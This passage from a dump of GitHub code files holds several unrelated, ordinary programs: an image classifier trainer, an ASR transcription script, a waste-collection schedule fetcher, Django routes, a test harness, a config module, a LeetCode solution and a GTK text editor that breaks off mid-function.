True\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\nImage.MAX_IMAGE_PIXELS = None\n\n\nclass AlbumentationsTransform:\n def __init__(self, agumentation={}):\n self.img_transforms = A.Compose(\n [\n A.Resize(224, 224),\n A.RGBShift(),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.2),\n A.ChannelShuffle(0.5),\n A.ColorJitter(p=0.3),\n A.Cutout(\n num_holes=3,\n max_h_size=24,\n max_w_size=24,\n fill_value=0,\n always_apply=False,\n p=0.5,\n ),\n A.ShiftScaleRotate(\n scale_limit=0.5, rotate_limit=0, shift_limit=0.1, p=1, border_mode=0\n ),\n A.PadIfNeeded(\n min_height=224, min_width=224, always_apply=True, border_mode=0\n ),\n A.IAAAdditiveGaussianNoise(p=0.2),\n A.IAAPerspective(p=0.3),\n A.ShiftScaleRotate(border_mode=cv2.BORDER_CONSTANT, p=0.3),\n A.RandomBrightnessContrast(p=0.3),\n A.OneOf(\n [\n A.CLAHE(p=1),\n A.RandomBrightness(p=1),\n A.RandomGamma(p=1),\n ],\n p=0.3,\n ),\n A.OneOf(\n [\n A.IAASharpen(p=1),\n A.Blur(blur_limit=3, p=1),\n A.MotionBlur(blur_limit=3, p=1),\n ],\n p=0.3,\n ),\n A.OneOf(\n [\n A.RandomContrast(p=1),\n A.HueSaturationValue(p=1),\n ],\n p=0.3,\n ),\n A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n ToTensorV2(),\n ]\n )\n\n def __call__(self, img):\n img = np.array(img)\n return self.img_transforms(image=img).copy()\n\n\nclass ImbalancedDatasetSampler(Sampler):\n \"\"\"Samples elements randomly from a given list of indices for imbalanced dataset\n Arguments:\n indices (list, optional): a list of indices\n num_samples (int, optional): number of samples to draw\n callback_get_label func: a callback-like function which takes two arguments - dataset and index\n \"\"\"\n\n def __init__(\n self, dataset, indices=None, num_samples=None, callback_get_label=None\n ):\n self.indices = list(range(len(dataset))) if indices is None else indices\n self.callback_get_label = callback_get_label\n self.num_samples = len(self.indices) if num_samples is None else num_samples\n label_to_count = {}\n for idx in self.indices:\n label = self._get_label(dataset, idx)\n if label in label_to_count:\n label_to_count[label] += 1\n else:\n label_to_count[label] = 1\n weights = [\n 1.0 / label_to_count[self._get_label(dataset, idx)] for idx in self.indices\n ]\n self.weights = torch.DoubleTensor(weights)\n\n def _get_label(self, dataset, idx):\n return dataset[idx][1]\n\n def __iter__(self):\n return (\n self.indices[i]\n for i in torch.multinomial(self.weights, self.num_samples, replacement=True)\n )\n\n def __len__(self):\n return self.num_samples\n\n\nclass UniversaClassificationTrainer(pl.LightningModule):\n def __init__(\n self,\n hparams={\n \"epochs_num\": 100,\n \"batch_size\": 64,\n \"lr\": 0.0002,\n \"train_valid_test_split\": [0.9, 0.05, 0.05],\n },\n model_type=\"resnet50\",\n dataset_path=\"dataset\",\n folders_structure={\n \"models_folder\": str(Path(__file__).parent / \"models\"),\n \"graph_folder\": str(Path(__file__).parent / \"graph_folder\"),\n \"confusion_matrix_folder\": str(Path(__file__).parent / \"confusion_matrix\"),\n \"test_img_folder\": str(Path(__file__).parent / \"test_img_folder\"),\n \"metadata_json_folder\": str(Path(__file__).parent / \"metadata_json\"),\n },\n ):\n super().__init__()\n self.metadata_dict = {}\n self._hparams = hparams\n self.model_type = model_type\n self.dataset_path = dataset_path\n self.model = self._load_specific_model()\n self.img_transforms = transforms.Compose([AlbumentationsTransform()])\n self.criterion = nn.CrossEntropyLoss()\n self.folders_structure = folders_structure\n self._split_dataset_to_dataloaders_and_return_classes()\n\n def _load_specific_model(self):\n number_of_classes = self._get_number_of_classes()\n if self.model_type == \"resnet50\":\n model = models.resnet50(pretrained=True).to(self.device)\n # for param in model.parameters():\n # param.requires_grad = False\n model.fc = nn.Sequential(\n nn.Linear(2048, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n elif self.model_type == \"resnet18\":\n model = models.resnet18(pretrained=True).to(self.device)\n for param in model.parameters():\n param.requires_grad = False\n model.fc = nn.Sequential(\n nn.Linear(512, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n elif self.model_type == \"resnet34\":\n model = models.resnet34(pretrained=True).to(self.device)\n for param in model.parameters():\n param.requires_grad = False\n model.fc = nn.Sequential(\n nn.Linear(2048, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n elif self.model_type == \"resnet101\":\n model = models.resnet101(pretrained=True).to(self.device)\n for param in model.parameters():\n param.requires_grad = False\n model.fc = nn.Sequential(\n nn.Linear(2048, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n elif self.model_type == \"resnet152\":\n model = models.resnet152(pretrained=True).to(self.device)\n for param in model.parameters():\n param.requires_grad = False\n model.fc = nn.Sequential(\n nn.Linear(2048, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n elif self.model_type == \"vgg16\":\n model = models.vgg16(pretrained=True)\n for param in model.parameters():\n param.requires_grad = False\n model.classifier = nn.Sequential(\n nn.Linear(25088, 128),\n nn.ReLU(inplace=True),\n nn.Linear(128, number_of_classes),\n ).to(self.device)\n model = model.to(self.device)\n return model\n\n def _get_number_of_classes(self):\n return len([f.path for f in os.scandir(self.dataset_path) if f.is_dir()])\n\n def get_training_augmentation(self):\n return lambda img: self.img_transforms(image=np.array(img))\n\n def _split_dataset_to_dataloaders_and_return_classes(self):\n dataset = datasets.ImageFolder(dataset_path, self.img_transforms)\n classes = dataset.classes\n self.classes = classes\n class_to_idx = dataset.class_to_idx\n self.class_to_idx = class_to_idx\n train_size = int(self.hparams[\"train_valid_test_split\"][0] * len(dataset))\n valid_size = int(self.hparams[\"train_valid_test_split\"][1] * len(dataset))\n test_size = int(self.hparams[\"train_valid_test_split\"][2] * len(dataset))\n rest = len(dataset) - train_size - valid_size - test_size\n train_size = train_size + rest\n if train_size + valid_size + test_size == len(dataset):\n train_set, valid_set, test_set = torch.utils.data.random_split(\n dataset, [train_size, valid_size, test_size]\n )\n else:\n try:\n train_set, valid_set, test_set = torch.utils.data.random_split(\n dataset, [train_size + 1, valid_size, test_size]\n )\n except:\n train_set, valid_set, test_set = torch.utils.data.random_split(\n dataset, [train_size, valid_size + 1, test_size]\n )\n self.train_set = train_set\n self.valid_set = valid_set\n self.test_set = test_set\n self.metadata_dict.update({\"classes\": classes})\n self.metadata_dict.update({\"class_to_idx\": class_to_idx})\n\n def forward(self, x):\n pred = self.model(x)\n return pred\n\n def train_dataloader(self):\n train_dataloader = torch.utils.data.DataLoader(\n self.train_set,\n sampler=ImbalancedDatasetSampler(self.train_set),\n batch_size=self.hparams[\"batch_size\"],\n num_workers=10,\n )\n return train_dataloader\n\n def val_dataloader(self):\n val_dataloader = torch.utils.data.DataLoader(\n self.valid_set,\n sampler=ImbalancedDatasetSampler(self.valid_set),\n batch_size=self.hparams[\"batch_size\"],\n num_workers=1,\n )\n return val_dataloader\n\n def test_dataloader(self):\n test_dataloader = torch.utils.data.DataLoader(\n self.test_set,\n sampler=ImbalancedDatasetSampler(self.test_set),\n batch_size=self.hparams[\"batch_size\"],\n num_workers=1,\n )\n return test_dataloader\n\n def training_step(self, batch, batch_nb):\n x, y = batch\n if isinstance(x, dict):\n x = x[\"image\"]\n pred = self(x)\n loss = self.criterion(pred, y)\n self.log(\"train_loss\", loss)\n return loss\n\n def validation_step(self, batch, batch_nb):\n x, y = batch\n if isinstance(x, dict):\n x = x[\"image\"]\n pred = self(x)\n loss = self.criterion(pred, y)\n self.log(\"val_loss\", loss)\n # Calculate accuracy\n top_p, top_class = pred.topk(1, dim=1)\n equals = top_class == y.view(*top_class.shape)\n accuracy = torch.mean(equals.type(torch.FloatTensor)).item()\n self.log(\"valid_accuracy\", accuracy)\n return loss\n\n def validation_epoch_end(self, outputs):\n os.makedirs(self.folders_structure[\"metadata_json_folder\"], exist_ok=True)\n self.metadata_dict.update({\"hparams\": self.hparams})\n self.metadata_dict.update({\"model_type\": self.model_type})\n json_file_path = os.path.join(\n self.folders_structure[\"metadata_json_folder\"], \"metadata.json\"\n )\n with open(json_file_path, \"w\") as fp:\n json.dump(self.metadata_dict, fp)\n return\n\n def test_step(self, batch, batch_nb):\n x, y = batch\n if isinstance(x, dict):\n x = x[\"image\"]\n pred = self(x)\n loss = self.criterion(pred, y)\n model_export_save_dir_path = os.path.join(\n self.folders_structure[\"models_folder\"]\n )\n os.makedirs(model_export_save_dir_path, exist_ok=True)\n model_name = self.model_type + \".pth\"\n model_save_path = os.path.join(model_export_save_dir_path, model_name)\n torch.save(self.model, model_save_path)\n self.log(\"test_loss\", loss)\n return loss\n\n def configure_optimizers(self):\n optimizer = AdamW_GCC2(self.model.parameters(), lr=self.hparams[\"lr\"])\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.cuda.empty_cache()\n dataset_path = \"datasets/fake_id_cards_for_oneshot\"\n model_type = \"resnet50\"\n model = UniversaClassificationTrainer(\n dataset_path=dataset_path, model_type=model_type\n )\n checkpoint_save_path = str(Path(__file__).parent / \"checkpoints_staff\")\n n_best_model_save_path = str(Path(__file__).parent / \"n_best_model\")\n checkpoint_callback = ModelCheckpoint(\n monitor=\"val_loss\",\n dirpath=n_best_model_save_path,\n filename=\"{epoch:02d}-{val_loss:.2f}\",\n save_top_k=1,\n mode=\"min\",\n )\n trainer = Trainer(\n gpus=1,\n precision=16,\n auto_lr_find=True,\n benchmark=True,\n max_epochs=1000,\n default_root_dir=checkpoint_save_path,\n check_val_every_n_epoch=1,\n callbacks=[checkpoint_callback],\n )\n # trainer.tune(model)\n # lr_finder = trainer.tuner.lr_find(model, early_stop_threshold=100)\n # new_lr = lr_finder.suggestion()\n # model.hparams['lr'] = new_lr\n trainer.fit(model)\n trainer.test(model)\n","repo_name":"kornellewy/kjn_face_id_system","sub_path":"kjn_face_id_system/id_card_classification_multi_shot/classification_universal_trainscript.py","file_name":"classification_universal_trainscript.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3629039531","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom zerospot.asr.constants import ASR_FILE_SUFFIX\nfrom zerospot.asr.interface import ASRModelInterface\n\n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse arguments for exporting.\n Returns: argparse.Namespace.\n \"\"\"\n arguments_parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n arguments_parser.add_argument(\n \"-src\",\n \"--src_dir\",\n help=\"Source directory with .wav (or .mp3) files in it\",\n type=Path,\n required=True,\n )\n arguments_parser.add_argument(\n \"-d\",\n \"--device\",\n help=\"Device (torch.device) for computation.\",\n type=str,\n required=False,\n default=\"cpu\",\n )\n arguments_parser.add_argument(\n \"-f\",\n \"--force_recompute\",\n help=\"Whether to force recompute transcriptions or not\",\n action=\"store_true\",\n default=False,\n )\n arguments_parser.add_argument(\n \"-s\",\n \"--suffix\",\n help=\"Suffix of audio files (.wav or .mp3)\",\n type=str,\n required=False,\n default=\".wav\",\n choices=[\".wav\", \".mp3\"],\n )\n return arguments_parser.parse_args()\n\n\ndef main(\n src_dir: Path, device: str, suffix: str, force_recompute: bool\n) -> None:\n # Setup logger\n logging.basicConfig(level=logging.getLevelName(\"INFO\"))\n logger = logging.getLogger(Path(__file__).name)\n\n # Collect audios\n audios = list(src_dir.rglob(f\"*{suffix}\"))\n\n if not force_recompute:\n audios = [\n audio_path\n for audio_path in audios\n if not audio_path.with_suffix(ASR_FILE_SUFFIX).exists()\n ]\n\n logger.info(f\"N. of audios to compute transcriptions: {len(audios)}\")\n\n logger.info(f\"Initializing ASR model interface...\")\n interface = ASRModelInterface(device=device)\n\n logger.info(f\"ASR model inference...\")\n transcriptions = interface.get_transcription(audios)\n\n for transcription, audio_path in tqdm(\n zip(transcriptions, audios), desc=\"Saving transcription files...\"\n ):\n save_path = audio_path.with_suffix(ASR_FILE_SUFFIX)\n transcription.to_json(save_path)\n\n logger.info(\"Computing transcription files is done.\")\n\n\ndef run():\n args = parse_args()\n main(**vars(args))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"Ryzagi/zero_shot_kws","sub_path":"zerospot/scripts/gather_asr.py","file_name":"gather_asr.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74146141228","text":"import json\nimport logging\nfrom datetime import datetime\n\nimport requests\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\n\n_LOGGER = logging.getLogger(__name__)\n\nTITLE = \"Landskrona - Svalövs Renhållning\"\nDESCRIPTION = \"Source for LSR waste collection.\"\nCOUNTRY = \"se\"\nURL = \"https://www.lsr.nu\"\nTEST_CASES = {\n \"Home\": {\"street_address\": \"Saxtorpsvägen 115, Annelöv\"},\n \"Polisen\": {\"street_address\": \"Herrevadsgatan 11, Svalöv\"},\n}\n\n# {\n# \"containerId\": \"12C\",\n# \"date\": \"2024-01-03T00:00:00\",\n# \"title\": \"Hämtning av restavfall (kärl 370 liter)\",\n# \"typeOfWaste\": \"REST\",\n# \"typeOfWasteDescription\": \"Restavfall\"\n# },\n# {\n# \"containerId\": \"13B\",\n# \"date\": \"2024-01-03T00:00:00\",\n# \"title\": \"Hämtning av matavfall (kärl 140 liter)\",\n# \"typeOfWaste\": \"MAT\",\n# \"typeOfWasteDescription\": \"Matavfall\"\n# }\n\nclass Source:\n def __init__(self, street_address):\n self._street_address = street_address\n\n def fetch(self):\n response = requests.get(\n \"https://minasidor.lsr.nu/api/api/external/schedule/\" + self._street_address,\n )\n\n data = response.json()\n\n entries = []\n for item in data:\n waste_type = item[\"typeOfWasteDescription\"]\n icon = \"mdi:trash-can\"\n if waste_type == \"Trädgårdsavfall\":\n icon = \"mdi:leaf\"\n next_pickup = item[\"date\"]\n next_pickup_date = datetime.fromisoformat(next_pickup).date()\n entries.append(Collection(date=next_pickup_date, t=waste_type, icon=icon))\n\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/lsr_nu.py","file_name":"lsr_nu.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"5697776056","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.Inicio, name='index'),\n path('Gaming/', views.listGaming, name='gaming'),\n path('Twitch/', views.listTwitch, name='twitch'),\n path('E-Sport/', views.listEsport, name='esport'),\n path('International/', views.listInternational, name='international'),\n path('Contacto/', views.contactUs, name= 'formContact'),\n path('Contacto/msgContact', views.msgContact, name='msgcontact'),\n path('Suscribirse', views.suscribirse, name='suscribirse'),\n path('Publicaciones//',views.detallePost, name = 'detallePost'),\n]","repo_name":"Guilgamech/nicegaming","sub_path":"apps/publicaciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42006196156","text":"'''\nRead the notes carefully\n1. Note you should only replace 'somewhere' and 'YourFunction' with your own model but WITHOUT any other modifications when you submit this file\n2. Run this file on validation set by '' python test.py --testfolder ../Validation_with_labels --num_class 10'', where '../Validation_with_labels' is the path of validation set, 10/107 is number of classes\n'''\n\n## import your model: replace 'somewhere' and 'YourFunction'\nfrom Model import predict\nimport numpy as np\nimport os\nimport argparse\n\n\nif __name__ == \"__main__\":\n # read the test folder\n parser = argparse.ArgumentParser(description='parameters setting')\n parser.add_argument('--testfolder', type=str, default='/dataset/Data10/Validation_with_labels')\n parser.add_argument('--num_class', type=int, default=10)\n\n args = parser.parse_args()\n testfolder = args.testfolder\n print(args.testfolder)\n \n # read true_ids\n true_ids = np.load(os.path.join(testfolder, 'true_ids.npy'))\n \n # read files\n files = os.listdir(testfolder)\n files.sort()\n \n # predict the ids\n predict_ids = []\n time_use = []\n\n\n for filename in files:\n # ignore true_ids.npy\n if filename == 'true_ids.npy':\n continue\n\n data = np.load(os.path.join(testfolder, filename))\n\n predict_id = predict(data, true_ids, args.num_class)\n predict_ids.append(predict_id)\n\n # compute the test accuracy\n test_accuracy = np.mean(np.array(predict_ids) == np.array(true_ids))\n print('Test Accuracy: {:.2f}'.format(test_accuracy))\n","repo_name":"siyuada/WriteId","sub_path":"test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11476735247","text":"import environs\n\nenv = environs.Env()\nenv.read_env()\n\nAPI_HOST = env.str(\"API_HOST\", \"localhost\")\nAPI_PORT = env.int(\"API_PORT\", 8000)\nENGINE_POSTGRES_URI = env.str(\n \"ENGINE_POSTGRES_URI\", \"postgresql://localhost/flight_assistant\"\n)\n\nOPENAI_API_KEY = env.str(\"OPENAI_API_KEY\", \"OPENAI_API_KEY\")\n\nOPENAI_SUMMARIZE_PROMPT = env.str(\n \"OPENAI_SUMMARIZE_PROMPT\",\n (\n \"Please provide a summary of change fees and cancellation fees. \"\n \"Please add GBP100 or equivalent in currency to all amounts in summary. \"\n \"Skip introduction and conclusion, start with the main point\"\n ),\n)\nOPENAI_SUMMARIZE_SETTINGS = {\n \"model\": env.str(\"OPENAI_SUMMARIZE_MODEL\", \"gpt-3.5-turbo-1106\"),\n \"temperature\": env.float(\"OPENAI_SUMMARIZE_TEMPERATURE\", 0.2),\n \"max_tokens\": env.int(\"OPENAI_SUMMARIZE_MAX_TOKENS\", 512),\n \"top_p\": 1,\n \"frequency_penalty\": 0,\n \"presence_penalty\": 0,\n}\n","repo_name":"vuonglv1612/flight-assistant","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1679550806","text":"class Solution:\r\n def multiply(self, num1: str, num2: str) -> str:\r\n places = len(num1) + len(num2)\r\n # Prod 12934 is [4 3 9 2 1]\r\n product = [0 for _ in range(places)]\r\n\r\n num1 = num1[::-1]\r\n num2 = num2[::-1]\r\n\r\n # some operations involving raising\r\n for place in range(places):\r\n for d1 in range(place+1):\r\n # working with num1[d1] & num2[place - d1 - 1]\r\n d2 = place - d1\r\n if d1 < len(num1) and d2 < len(num2):\r\n sub_prod = int(num1[d1]) * int(num2[d2]) + product[place]\r\n product[place] = sub_prod % 10\r\n product[place + 1] += sub_prod // 10\r\n\r\n while (product[-1] == 0) and len(product) > 1:\r\n product = product[:-1]\r\n return \"\".join(map(str, product[::-1]))\r\n\r\ndef main():\r\n sol = Solution()\r\n for i in range(101):\r\n for j in range(1001):\r\n if sol.multiply(str(i), str(j)) != str(i*j):\r\n print(i, j)\r\n # print(sol.multiply(\"123\",\"123\"))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ChoBro1/LeetCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1142416921","text":"from os import system \nfrom listas import Stack\n\nclear = lambda: system(\"cls\")\n\n# Limpiar pantalla\nclear()\n\n# Crear la instancia de la pila\npila = Stack()\n\nprint(f\"¿La pila está vacía?: {pila.Empty()}\")\n\n# Ingresar elementos en la pila\npila.Push(\"Juan\")\npila.Push(21)\npila.Push(2022)\n\nprint(f\"\\n¿La pila está vacía?: {pila.Empty()}\")\n\nprint(\"\\nElementos en la pila:\")\npila.Show()\n\n# Retirar un elemento en la pila\npila.Pop()\n\nprint(\"\\n\\nElementos en la pila:\")\npila.Show()\n\n\n# Ejercicio:\n# Elaborar un sistema que almacene elementos como la descripción, valor unitario, cantidad\n# y subtotal de cada producto en una factura y mostrar el valor total al final.\n# Presentar opciones para ingresar un nuevo elemento y para modificar únicamente el último elemento\n# ingresado. La modificación se hace eliminando el último elemento e ingresando un elemento nuevo\n# con los datos actualizados.\n\n\n\n","repo_name":"diegocruzo/MisionTIC2022","sub_path":"2022-05-21/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1031190861","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gio, Pango, Gdk\nimport subprocess\nimport re\n\nclass TextEditor(Gtk.Window):\n\n def __init__(self):\n Gtk.Window.__init__(self, title=\"Writher\")\n self.set_default_size(800, 600)\n\n # Box layout\n self.box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n self.add(self.box)\n\n # HeaderBar\n self.header_bar = Gtk.HeaderBar()\n self.header_bar.set_show_close_button(True)\n self.header_bar.props.title = \"Writher\"\n self.set_titlebar(self.header_bar)\n\n # Open button with arrow\n self.open_button = Gtk.MenuButton.new()\n self.open_button.set_label('Open \\u25BC')\n self.header_bar.pack_start(self.open_button)\n\n # Popover menu with open and save options\n self.menu = Gio.Menu()\n self.menu.append(\"Open\", \"app.open\")\n self.menu.append(\"Save\", \"app.save\")\n self.open_button.set_menu_model(self.menu)\n \n # Font and font-size selection list\n self.font_combo = Gtk.ComboBoxText()\n\n # Get available font families using fc-list command\n output = subprocess.check_output([\"fc-list\", \":lang=en\", \"--format=%{family[0]}\\n\"])\n font_families = output.decode(\"utf-8\").splitlines()\n\n # Remove duplicates and sort font families\n unique_font_families = sorted(set(font_families))\n\n # Populate the font combo box with the font families\n for idx, font_family in enumerate(unique_font_families):\n self.font_combo.insert(idx, font_family, font_family)\n\n self.font_combo.set_active(0)\n\n self.font_size_combo = Gtk.ComboBoxText()\n self.font_size_combo.insert(0, \"8\", \"8\")\n self.font_size_combo.insert(1, \"10\", \"10\")\n self.font_size_combo.insert(2, \"12\", \"12\")\n self.font_size_combo.insert(3, \"14\", \"14\")\n self.font_size_combo.insert(4, \"16\", \"16\")\n self.font_size_combo.insert(5, \"18\", \"18\")\n self.font_size_combo.insert(6, \"20\", \"20\")\n self.font_size_combo.insert(7, \"22\", \"22\")\n self.font_size_combo.insert(8, \"24\", \"24\")\n self.font_size_combo.set_active(4)\n\n self.font_combo.connect(\"changed\", self.on_font_changed)\n self.font_size_combo.connect(\"changed\", self.on_font_size_changed)\n\n font_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=4)\n font_box.set_margin_start(4)\n\n # Add the font combo box and font size combo box to the font_box\n font_box.pack_start(self.font_combo, False, False, 0)\n font_box.pack_start(self.font_size_combo, False, False, 0)\n\n # Add the font_box to the right of the \"Open\" button in the headerbar\n self.header_bar.pack_end(font_box)\n\n # TextView\n self.text_view = Gtk.TextView()\n self.text_view.set_margin_start(0)\n self.text_view.set_margin_end(0)\n self.text_view.set_margin_top(0)\n self.text_view.set_margin_bottom(0)\n self.text_view.set_left_margin(80)\n self.text_view.set_right_margin(80)\n self.text_view.set_top_margin(40)\n self.text_view.set_bottom_margin(20)\n\n # Connect the changed signal to update the title\n self.text_view.get_buffer().connect(\"changed\", self.on_text_buffer_changed)\n\n # Set word wrapping\n self.text_view.set_wrap_mode(Gtk.WrapMode.WORD)\n self.text_buffer = self.text_view.get_buffer()\n\n # ScrolledWindow\n self.scrolled_window = Gtk.ScrolledWindow()\n self.scrolled_window.add(self.text_view)\n\n # Utility pane\n self.utility_pane = Gtk.ListBox()\n self.utility_pane.set_selection_mode(Gtk.SelectionMode.NONE)\n css = b\"\"\"\n list { background-color: inherit; }\n \"\"\"\n self.apply_css(self.utility_pane, css)\n\n self.utility_pane.set_vexpand(False)\n self.utility_pane.set_valign(Gtk.Align.START)\n self.utility_pane.set_selection_mode(Gtk.SelectionMode.NONE)\n self.utility_pane.set_margin_top(20)\n self.utility_pane.set_margin_start(20)\n self.utility_pane.set_margin_end(20)\n\n width, _ = self.get_size()\n utility_pane_width = int(width * 0.11)\n self.utility_pane.set_size_request(utility_pane_width, -1)\n\n self.utility_labels = {\n \"Words\": Gtk.Label.new(\"0\"),\n \"Characters\": Gtk.Label.new(\"0\"),\n \"Sentences\": Gtk.Label.new(\"0\"),\n \"Paragraphs\": Gtk.Label.new(\"0\"),\n \"Reading time\": Gtk.Label.new(\"0\"),\n }\n\n for label in self.utility_labels.values():\n label.set_use_markup(True)\n attr_list = Pango.AttrList()\n attr_list.insert(Pango.attr_weight_new(Pango.Weight.BOLD))\n label.set_attributes(attr_list)\n\n\n for key, label in self.utility_labels.items():\n row = Gtk.ListBoxRow()\n hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=30)\n row.add(hbox)\n label_key = Gtk.Label.new(key + \":\")\n hbox.pack_start(label_key, False, False, 0)\n hbox.pack_start(label, False, False, 0)\n self.utility_pane.add(row)\n\n # Main layout\n self.main_layout = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n self.main_layout.pack_start(self.utility_pane, False, False, 0)\n self.main_layout.pack_start(self.scrolled_window, True, True, 0)\n self.box.pack_start(self.main_layout, True, True, 0)\n\n # Open and save actions\n self.application = Gio.Application.get_default()\n self.open_action = Gio.SimpleAction.new(\"open\", None)\n self.open_action.connect(\"activate\", self.open_file)\n self.application.add_action(self.open_action)\n\n self.save_action = Gio.SimpleAction.new(\"save\", None)\n self.save_action.connect(\"activate\", self.save_file)\n self.application.add_action(self.save_action)\n \n # Connect the delete-event signal to the confirm_close function\n self.connect(\"delete-event\", self.confirm_close)\n\n # Connect the window-state-event signal to the on_window_state_changed function\n self.connect(\"window-state-event\", self.on_window_state_changed)\n\n # Connect the size-allocate signal to the on_size_allocate function\n self.connect(\"size-allocate\", self.on_size_allocate)\n \n def apply_css(self, widget, css):\n css_provider = Gtk.CssProvider()\n css_provider.load_from_data(css)\n\n context = widget.get_style_context()\n context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\n if isinstance(widget, Gtk.Container):\n for child in widget.get_children():\n self.apply_css(child, css)\n\n def update_title(self):\n text_buffer = self.text_view.get_buffer()\n if hasattr(self, 'file_path'):\n file_name = self.file_path.split('/')[-1]\n else:\n start, end = text_buffer.get_bounds()\n content = text_buffer.get_text(start, end, True)\n sentences = content.split('.')\n file_name = ' '.join(sentences[:3]) + \"...\"\n self.header_bar.set_title(f\"Writher - {file_name}\")\n\n def on_text_buffer_changed(self, text_buffer):\n self.update_title()\n\n def open_file(self, action, param):\n file_chooser = Gtk.FileChooserDialog(\n title=\"Open File\",\n parent=self,\n action=Gtk.FileChooserAction.OPEN,\n buttons=(\n Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN,\n Gtk.ResponseType.OK,\n ),\n )\n\n response = file_chooser.run()\n if response == Gtk.ResponseType.OK:\n self.file_path = file_chooser.get_filename()\n with open(self.file_path, \"r\") as f:\n content = f.read()\n self.text_view.get_buffer().set_text(content)\n self.update_title()\n file_chooser.destroy()\n\n def save_file(self, action, param):\n file_chooser = Gtk.FileChooserDialog(\n title=\"Save File\",\n parent=self,\n action=Gtk.FileChooserAction.SAVE,\n buttons=(\n Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_SAVE,\n Gtk.ResponseType.OK,\n ),\n )\n\n response = file_chooser.run()\n if response == Gtk.ResponseType.OK:\n self.file_path = file_chooser.get_filename()\n text_buffer = self.text_view.get_buffer()\n start, end = text_buffer.get_bounds()\n content = text_buffer.get_text(start, end, True)\n with open(self.file_path, \"w\") as f:\n f.write(content)\n self.update_title()\n file_chooser.destroy()\n\n def on_font_changed(self, combo):\n font_name = combo.get_active_text()\n font_desc = Pango.FontDescription.from_string(font_name + \" \" + str(self.font_size_combo.get_active_text()))\n self.text_view.modify_font(font_desc)\n\n def on_font_size_changed(self, combo):\n font_size = int(combo.get_active_text())\n font_desc = Pango.FontDescription.from_string(self.font_combo.get_active_text() + \" \" + str(font_size))\n self.text_view.modify_font(font_desc)\n \n def unsaved_changes(self):\n text_buffer = self.text_view.get_buffer()\n return text_buffer.get_modified()\n\n def unsaved_changes(self):\n text_buffer = self.text_view.get_buffer()\n return text_buffer.get_modified()\n\n def confirm_close(self, widget, event=None):\n if self.text_buffer.get_modified():\n dialog = Gtk.MessageDialog(\n transient_for=self,\n flags=0,\n message_type=Gtk.MessageType.QUESTION,\n buttons=Gtk.ButtonsType.YES_NO,\n text=\"Unsaved changes detected\",\n )\n dialog.format_secondary_text(\n \"You have unsaved changes. If you close the application now, your changes will be lost. Do you want to save your changes before closing?\"\n )\n response = dialog.run()\n\n if response == Gtk.ResponseType.YES:\n dialog.destroy()\n self.save_file(widget)\n elif response == Gtk.ResponseType.NO:\n dialog.destroy()\n return False\n else:\n dialog.destroy()\n return True\n return False\n\n def on_window_state_changed(self, widget, event):\n fullscreen = event.new_window_state & Gdk.WindowState.FULLSCREEN\n self.utility_pane.set_visible(not fullscreen)\n\n def on_size_allocate(self, widget, allocation):\n width, _ = self.get_size()\n utility_pane_width = int(width * 0.11)\n self.utility_pane.set_size_request(utility_pane_width, -1)\n\n def update_utility_pane(self): \n text_buffer = self.text_view.get_buffer()\n start, end = text_buffer.get_bounds()\n content = text_buffer.get_text(start, end, True)\n\n words = len(re.findall(r'\\b\\w+\\b', content))\n self.utility_labels[\"Words\"].set_text(str(words))\n\n 